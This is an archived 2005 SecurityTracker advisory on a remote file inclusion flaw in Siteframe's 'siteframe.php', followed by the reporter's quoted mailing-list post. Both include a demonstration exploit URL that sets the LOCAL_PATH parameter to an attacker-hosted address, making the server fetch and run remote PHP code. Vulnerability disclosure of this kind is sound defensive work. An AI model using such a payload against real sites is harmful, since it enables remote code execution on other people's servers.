SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  Siteframe Vendors:  Broadpool
Siteframe Include File Flaw in 'siteframe.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014150
SecurityTracker URL:  http://securitytracker.com/id?1014150
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 9 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  PRI[l from MOROCCO reported a vulnerability in Siteframe. A remote user can execute arbitrary commands on the target system.

The 'siteframe.php' script includes files relative to the user-supplied 'LOCAL_PATH' parameter without properly validating the input. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/siteframe/siteframe.php?LOCAL_PATH=http://[attacker]/PRI[ll
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.siteframe.org/ (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "the_r00t theroot" <the_r00t3r@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Thu, 09 Jun 2005 01:21:19 +0000
From:  "the_r00t theroot" <the_r00t3r@hotmail.com>
Subject:  siteframe file bug in siteframe.php let's Remote Users Execute Arbitrary Command

 
 
Title : siteframe file bug in siteframe.php let's Remote Users Execute 
Arbitrary Command
Date : 09/06/2005
Impact: Remote code execution
Risk Level: High
 
http://victim.com/siteframe/siteframe.php?LOCAL_PATH=http://attacker.com/PRI[ll
 
..::Credits for this vulnerability goes to PRI[l from MOROCCO::..
greetz : Arabian FighterZ  - #whackerz - Mianwalian - mani1 - ch33ta - and 
all friends :D
..::PROUD TO BE Moroccan::..
 
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC